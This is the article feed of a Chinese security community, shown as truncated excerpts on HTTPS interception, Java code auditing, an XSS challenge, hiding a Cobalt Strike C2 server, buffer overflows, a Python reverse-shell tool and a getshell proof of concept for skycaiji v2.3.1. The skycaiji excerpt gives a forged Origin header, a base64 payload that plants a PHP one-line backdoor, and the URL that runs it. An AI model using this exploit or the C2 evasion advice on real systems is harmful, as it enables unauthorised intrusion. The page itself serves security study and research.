红帽社区—为网络安全而聚

HTTPS采用高安全性的TLS加密，可为什么Fiddler抓到HTTPS的包能解密？

余光：因为你信任了它的证书，并且设置了网络代理为抓包软件，本来是 APP传给服务器现在变成了APP传给抓包工具，抓包工具给服务器对于服务器来说, 抓包工具就是APP, 对于APP来说, 抓包工具就是服务器所以不要乱装证书，协议本身没问题补充：比如APP调用服务器接口。想要不被中间人篡改数据，上https就行。但想要不被用户篡改，还需要给数据签名。看都不想让用户看到，那可能需要https证书双向校验，或者数据再加密。阅读全文

8个回答-3899个浏览

关注

收藏

java代码审计

java编译篇 java编译过程： Java源代码 ——（编译）——> Java字节码 ——（解释器）——> 机器码 Java源代码 ——（编译器）——> jvm可执行的Java字节码 ——（jvm解释器） ——> 机器可执行的二进制机器码 ——>程序运行采用字节码的好处：高效、可移植性高以下示例为.java文件：以下是.class文件：反编译工具篇 fernflower jad jd-gui idea自带插件 jar包本质上是将所有class文件、资源文件压缩打成一个包。 Servlet与jsp篇 Servlet：类似小程序，处理较复杂的服务端业务逻辑含有HttpServlet类，可进行重写 servlet3.0后使用注解方式描述servlet，使用doGet和doPost为默认命名 servlet3.0版本之前必须在web.中配置 jsp：会被编译成一个java类文件，如index.jsp在Tomcat中Jasper编译后会生成index_jsp.java和index_jsp.class两个文件。是特殊的servlet。全局控制器篇使用idea，全局搜索command+shift+f（或者a） find ~/cms/ -type f -name "*.class" |xargs grep -E "Controller|@RestController|RepositoryRestController" find ~/cms/ -type f -name "*.class" |xargs grep -E "RequestMapping|GetMapping|PostMapping|PutMapping|DeleteMapping|PatchMapping|RepositoryRestResource" 全局过滤器篇审计时，得先看是否含有全局过滤器。切勿看到Servlet、JSP中的漏洞点就妄下定论，Servlet前面很有可能存在一个全局安全过滤的Filter。当然每种框架的写法也有差别。个人认为Filter主要是用在 web.全局过滤 Y 阅读全文

8个评论-3683个浏览

甜味折耳猫

收藏

Marginwidth/marginheight – 意想不到的跨源通信通道

2020年7月6日，我在Twitter上宣布了XSS挑战，到目前为止，只有四个人能够解决它，每个人都告诉我他们以前从未听说过挑战中使用这种"奇特"的方式，因此，这里有一篇文章解释了这个"奇特"以及一些背景故事。挑战的核心在于以下几行JavaScript： document.addEventListener("DOMContentLoaded" () => { for (let attr of document.body.attributes) { eval(attr.value); } }); 该代码仅对元素的所有属性进行迭代，并将所有这些属性的值作为JavaScript执行。由于挑战中没有其他源，这意味着要解决该问题，需要找到一种方法来将任意属性值注入document.body。那怎么可能呢？当我注意到HTML规范中一个有趣的代码片段时，一切就开始了。规范的第14部分称为“渲染”，介绍了某些元素的默认样式。例如，它说or 元素默认情况下不显示（即 display:none）。有趣的是的边距是如何确定的？该表表示，如果标签拥有一个名为marginheight的属性，那么它将映射到该元素的CSS属性——margin-top上。如果不存在该属性，则检查topmargin属性。如果也不存在，那么（接下来就很有意思了），如果当前页面位于嵌套的浏览器上下文（就是说在或）中，浏览器将使用容器元素的marginwidth属性。这种现象在跨域的时候也一样，这是规范中直接允许的：起初，我认为这是一个历史遗留问题，并且没有哪个现代浏览器实际以这种方式实现它。浏览器行为为了测试浏览器的行为，我有一个简单的代码，可让我检查是否考虑了该marginwidth属性。 Chromium 在Chromium中，该marginwidth属性反映在元素中，但在赋值之前已被强制转换为整数。有趣的是Chromium会监听此值的更改，因此，如果您动态更改它，它也会反映在i中。这是一个例子： i input { width:400px; } Firefox 在Firefox中，的值根阅读全文

8个评论-3797个浏览

收藏

初柒文章11篇
-
粉丝6

莓办法文章4篇
-
粉丝4

香蕉雪梨苹果橙科技文章10篇
-
粉丝8

m0ke 文章12篇
-
粉丝4

红队-C2 Server基础构建

C2 使目标机器可以接收来自服务器的命令，但实战中通常在恶意软件分析的时候是首先被分析出来的，所以这也就是需要对C2 server加固的原因。下面将C2 server部署时候你需要认识的一些点总结来更好建设、隐蔽、使用你的C2 server。个人水平较差、内容浅显，文中错误内容还请师傅们指教纠正. 0x01 C2 Server基础建设修改默认配置 CS默认端口的50050端口是需要修改的位于teamserver脚本文件划到最后一行: 如果没有配置C2_profile那也别用默认的CS证书， qing@ubuntu:~/cs_server$ keytool -list -v -keystore cobaltstrike.store Enter keystore password: Keystore type: jks Keystore provider: SUN Your keystore contains 1 entry Alias name: cobaltstrike Creation date: Jun 14 2019 Entry type: PrivateKeyEntry Certificate chain length: 1 Certificate[1]: Owner: CN=Major Cobalt Strike OU=AdvancedPenTesting O=cobaltstrike L=Somewhere ST=Cyberspace C=Earth Issuer: CN=Major Cobalt Strike OU=AdvancedPenTesting O=cobaltstrike L=Somewhere ST=Cyberspace C=Earth Serial number: 3312d415 Valid from: Fri Jun 14 04:17:43 PDT 2019 until: Thu Sep 12 04:17:43 PDT 2019 Certificate fingerprints: MD5: AB:D2:A4:18:5E:A7:6A:32:CC:1E:74:8C:67:D9 阅读全文

9个评论-3817个浏览

代码养殖媛

收藏

缓冲区溢出的入门介绍

缓冲区溢出漏洞概念：在计算机程序中，就是数据使用到了被分配内存空间之外的内存空间。而缓冲区溢出，简单的说就是计算机对接收的输入数据没有进行有效的检测（理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符），向缓冲区内填充数据时超过了缓冲区本身的容量，而导致数据溢出到被分配空间之外的内存空间，使得溢出的数据覆盖了其他内存空间的数据，缓冲区溢出是针对程序设计缺陷，向程序输入缓冲区写入使之溢出的内容（通常是超过缓冲区能保存的最大数据量的数据），从而破坏程序的堆栈，使程序转而执行其他指令，以达到攻击的目的。缓冲区溢出漏洞产生原理：官话有点多，下面简单介绍一下缓冲区溢出漏洞是如何发生的。以下是对C语言中缓冲区溢出漏洞的理解，因为C语言中并没有对数组和指针的引用进行检查，所以在平时的程序运行时缓冲区溢出漏洞更容易出现。例子：#includevoid main(){chara [10];gets(a);}这个程序中若输入的字符数不超过10个，像helloworld，则运行正常，若输入的是helloworld则程序发生溢出。因为程序只申请了10个字符，而输入的字符超过了这个数目，这时，多余的字符将会占用不属于自己的内存空间。由于C语言并不会进行边界检查，所以程序看似运行正常。如果被占用的内存本来就是空的，或者不重要。那么程序也会正常运行，如果是重要的信息，将会造成严重后果。在实际的运行过程中缓冲区溢出又分为堆溢出和栈溢出。堆溢出：堆溢出的原理是覆盖其他重要的数据以达到目的。但是实现比较困难：首先要确定那个变量是重要的变量，其次要知道比目标变量低的溢出点的内存位置，最后重要的变量被覆盖后程序还能继续运行下去。栈溢出：栈溢出的原理是覆盖函数的返回地。函数调用过程中，函数的返回地址保存在栈里面。所以栈溢出的思路就是把栈里面的返回地址覆盖，然后替换成攻击者想要的地址。因为栈是往下增加的，先进入栈的地址反而要大，这种机制更方便的提供了漏洞产生的可能性。缓冲区溢出的危害：缓冲区溢出攻击，可以导致程序运行失败、系统关机、重新启动，或者执行攻击者的指令，比如非法提升权限。缓冲区漏洞对应函数：C/C++语言中像strcpy函数还有strcat()、sprintf()、vsprintf()、gets()、scanf() 以及在循环内的getc()、fgetc()、getchar()等这些常见的阅读全文

7个评论-4100个浏览

收藏

利用恶意软件以绕过 DNA 筛查，“生物战”一触即发！

《网络生物安全：合成生物学中的远程DNA注入威胁一种新的对DNA科学家的网络攻击，可能会引发生物战。漏洞要求采用筛选方案来扫描潜在有害的脱氧核糖核酸。研究人员使用恶意代码通过混淆来规避这些协议。测试表明，50个混淆的DNA样品中有16个能够绕过脱氧核糖核酸筛选。研究人员还解释说，威胁行为者可以对用于设计和管理合成DNA项目的软件进行浏览器内攻击，以将任意DNA串注入遗传顺序。恶意软件可以操纵残留的Cas9蛋白，将这种序列转化为病原体。阅读全文

3个评论-3778个浏览

开放的帅哥

收藏

自写渗透工具之shell工具编写(python篇)

前几天写了个c反弹shell的工具，实在是无奈，c被杀的太狠了，看一张图就明白了忽然想起来，用python写效果可能会更好，说干就干。知识储备编写反弹shell，我们首先要明白简单的通信原理。在python里面实现通信，我们需要一个socket库。我们可以使用下面的方法轻易的实现一个能够通信的服务端、客户端 import socket phone = socket.socket(socket.AF_INET,socket.SOCK_STREAM) phone.bind(('127.0.0.1',2333)) phone.listen() phone.accept() import socket phone = socket.socket(socket.AF_INET,socket.SOCK_STREAM) phone.connect(('127.0.0.1',2333)) 除了这些之外，还有一些常用的函数用来实现通信： recv() #接受TCP数据 send() #发送TCP数据 recvfrom() #接受UDP数据 sendto() #发送UDP数据 getpeername() #接收到当前套接字远端的地址 getsockname() #返回指定套接字的参数 setsockopt() #设置指定套接字的参数 close() #关闭套接字了解了通信模块之后，我们还需要一个subprocess子进程模块，因为我们的目的不是通信，而是将我们发送的命令进行执行，并返回给我们，而subprocess子进程模块就可以实现我们的需求。这个模块本身是为了代替一些老的模块而来的，所以使用起来很方便。 import subprocess #Popen方法是用来执行系统命令的，直接把结果打印到终端了 res =subprocess.Popen(r'dir',shell=True, #r'dsfsdfr',shell=True, # stdin= #标准输入（不常用） stdout=subprocess.PIPE,#stdou 阅读全文

5个评论-3591个浏览

收藏

蓝天采集器v2.3.1 getshell

下载2.3.1版本 https://github.com/zorlan/skycaiji 漏洞复现文中sky231.com为本地设置域名漏洞点位于后台安装插件功能处，首先登陆后台 1.访问 http://xxxx.com/index.php?s=/Admin/Store/installPlugin 2.添加http头Origin: http://www.skycaiji.com 3.post输入 plugin=eyJhcHAiOiJBYUFhQWEiLCJuYW1lIjoidGVzdDEiLCJ0eXBlIjoicmVsZWFzZSIsIm1vZHVsZSI6InRlc3QyIiwiY29kZSI6IlBEOXdhSEFLTHlvS2JtRnRaWE53WVdObElIQnNkV2RwYmx4eVpXeGxZWE5sWEdOdGN6c0tDbU5zWVhOeklFRmhRV0ZCWVhzS0NYQjFZbXhwWXlBa2NtVnNaV0Z6WlRzS2ZTb3ZDa0JsZG1Gc0tDUmZSMFZVVzJGZEtUc0tQejQ9In0= 如图接着会在\plugin\release\cms\下生成AaAaAa.php的一句话后门，如图然后在后台点击发布插件选项卡，接着点击开发按钮，如图这时会引用我们带有一句话木马的文件，在url上添加a参数即可执行任意php代码，进而getshell，以执行phpinfo为例，访问 http://sky231.com/index.php?s=/admin/Develop/releaseCms&app=AaAaAa&a=phpinfo(); 如图代码审计漏洞出发点位于/SkycaijiApp/admin/controller/Store.php文件中的installPluginAction函数，如图首先代码会执行$this->_checkOrigin();函数，我们跟进一下该函数是用来判断请求的来源是否在白名单中，注意到这里获取请求来源使用了$_SERVER['HTTP_ORIGIN'] 这里我们只要在请求时加上一个Origin请求头，并将其值改为阅读全文

7个评论-3695个浏览

收藏

更多

加载中，请稍候

请求超时，点击重新加载

提问

写文章

专栏

小密圈

规划中敬请期待

规划中敬请期待

规划中敬请期待

规划中敬请期待

规划中敬请期待

规划中敬请期待